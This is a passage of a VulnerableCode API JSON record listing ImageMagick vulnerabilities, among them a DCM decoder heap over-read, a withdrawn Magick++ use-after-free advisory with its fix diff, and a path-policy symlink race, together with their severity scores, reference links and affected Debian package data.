"scoring_elements": "0.05082", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05112", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25989" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25989", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25989" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/5a545ab9d6c3d12a6a76cfed32b87df096729d95", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/5a545ab9d6c3d12a6a76cfed32b87df096729d95" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7355-pwx2-pm84", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:08:53Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7355-pwx2-pm84" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25989", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25989" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442136", "reference_id": "2442136", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442136" }, { "reference_url": "https://github.com/advisories/GHSA-7355-pwx2-pm84", "reference_id": "GHSA-7355-pwx2-pm84", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7355-pwx2-pm84" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25989", "GHSA-7355-pwx2-pm84" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sd54-b8z1-2fg7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24164?format=api", "vulnerability_id": "VCID-sdc2-fcap-abaz", "summary": "ImageMagick has Heap Out-of-Bounds Read in DCM Decoder (ReadDCMImage)\nA heap out-of-bounds read vulnerability exists in the `coders/dcm.c` module. When processing DICOM files with a specific configuration, the decoder loop incorrectly reads bytes per iteration. This causes the function to read past the end of the allocated buffer, potentially leading to a Denial of Service (crash) or Information Disclosure (leaking heap memory into the image).", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25982.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25982.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25982", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04223", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04211", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04092", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04084", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04142", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04156", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04176", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04162", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04116", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0413", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16707", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25982" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25982", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25982" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pmq6-8289-hx3v", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:03:44Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pmq6-8289-hx3v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25982", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25982" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442124", "reference_id": "2442124", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442124" }, { "reference_url": "https://github.com/advisories/GHSA-pmq6-8289-hx3v", "reference_id": "GHSA-pmq6-8289-hx3v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pmq6-8289-hx3v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25982", "GHSA-pmq6-8289-hx3v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sdc2-fcap-abaz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23701?format=api", "vulnerability_id": "VCID-spch-fffg-4yc5", "summary": "Withdrawn Advisory: ImageMagick has a use-after-free/double-free risk in Options::fontFamily when clearing family\n## Withdrawn Advisory\nThis advisory has been withdrawn because it does not affect the ImageMagick project's NuGet packages.\n\n### Original Description\nWe believe that we have discovered a potential security vulnerability in ImageMagick’s Magick++ layer that manifests when `Options::fontFamily` is invoked with an empty string.\n\n**Vulnerability Details**\n- Clearing a font family calls `RelinquishMagickMemory` on `_drawInfo->font`, freeing the font string but leaving `_drawInfo->font` pointing to freed memory while `_drawInfo->family` is set to that (now-invalid) pointer. Any later cleanup or reuse of `_drawInfo->font` re-frees or dereferences dangling memory.\n- `DestroyDrawInfo` and other setters (`Options::font`, `Image::font`) assume `_drawInfo->font` remains valid, so destruction or subsequent updates trigger crashes or heap corruption.\n\n```cpp\nif (family_.length() == 0)\n {\n _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->font);\n DestroyString(RemoveImageOption(imageInfo(),\"family\"));\n }\n```\n\n- **CWE-416 (Use After Free):** `_drawInfo->font` is left dangling yet still reachable through the Options object.\n- **CWE-415 (Double Free):** DrawInfo teardown frees `_drawInfo->font` again, provoking allocator aborts.\n\n**Affected Versions**\n- Introduced by commit `6409f34d637a34a1c643632aa849371ec8b3b5a8` (“Added fontFamily to the Image class of Magick++”, 2015-08-01, blame line 313).\n- Present in all releases that include that commit, at least ImageMagick 7.0.1-0 and later (likely late 6.9 builds with Magick++ font family support as well). Older releases without `fontFamily` are unaffected.\n\n**Command Line Triggerability**\nThis vulnerability cannot be triggered from the command line interface. The bug is specific to the Magick++ C++ API, specifically the `Options::fontFamily()` method. The command-line utilities (such as `convert`, `magick`, etc.) do not expose this particular code path, as they operate through different internal mechanisms that do not directly call `Options::fontFamily()` with an empty string in a way that would trigger the use-after-free condition.\n\n**Proposed Fix**\n```diff\ndiff --git a/Magick++/lib/Options.cpp b/Magick++/lib/Options.cpp\n@@ void Magick::Options::fontFamily(const std::string &family_)\n- _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->font);\n+ _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->family);\n```\nThis frees only the actual family string, leaving `_drawInfo->font` untouched. Optionally nulling `_drawInfo->font` when clearing `font()` itself maintains allocator hygiene.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-65955.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-65955.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65955", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.05753", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07781", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07797", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07883", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07896", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07925", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07901", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07844", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.0789", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07912", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07936", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65955" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-65955", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-65955" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/6409f34d637a34a1c643632aa849371ec8b3b5a8", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/6409f34d637a34a1c643632aa849371ec8b3b5a8" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/6f81eb15f822ad86e8255be75efad6f9762c32f8", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/6f81eb15f822ad86e8255be75efad6f9762c32f8" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1122827", "reference_id": "1122827", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1122827" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418549", "reference_id": "2418549", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418549" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65955", "reference_id": "CVE-2025-65955", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65955" }, { "reference_url": "https://github.com/advisories/GHSA-q3hc-j9x5-mp9m", "reference_id": "GHSA-q3hc-j9x5-mp9m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q3hc-j9x5-mp9m" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-q3hc-j9x5-mp9m", "reference_id": "GHSA-q3hc-j9x5-mp9m", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-q3hc-j9x5-mp9m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-65955", "GHSA-q3hc-j9x5-mp9m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-spch-fffg-4yc5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24208?format=api", "vulnerability_id": "VCID-sw7g-hxxr-n3e1", "summary": "ImageMagick has a Path Policy TOCTOU symlink race bypass\n`domain=\"path\"` authorization is checked before final file open/use. A symlink swap between check-time and use-time bypasses policy-denied read/write.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28689.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28689.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28689", "reference_id": "", "reference_type": "", "scores": [ { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00712", "published_at": "2026-04-09T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00722", "published_at": "2026-04-08T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00723", "published_at": "2026-04-07T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00718", "published_at": "2026-04-04T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00721", "published_at": "2026-04-02T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00949", "published_at": "2026-04-24T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00896", "published_at": "2026-04-18T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.0089", "published_at": "2026-04-12T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00892", "published_at": "2026-04-13T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00889", "published_at": "2026-04-16T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00945", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28689" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28689", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28689" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-493f-jh8w-qhx3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-10T15:56:31Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-493f-jh8w-qhx3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28689", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28689" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445891", "reference_id": "2445891", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445891" }, { "reference_url": "https://github.com/advisories/GHSA-493f-jh8w-qhx3", "reference_id": "GHSA-493f-jh8w-qhx3", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-493f-jh8w-qhx3" } ], 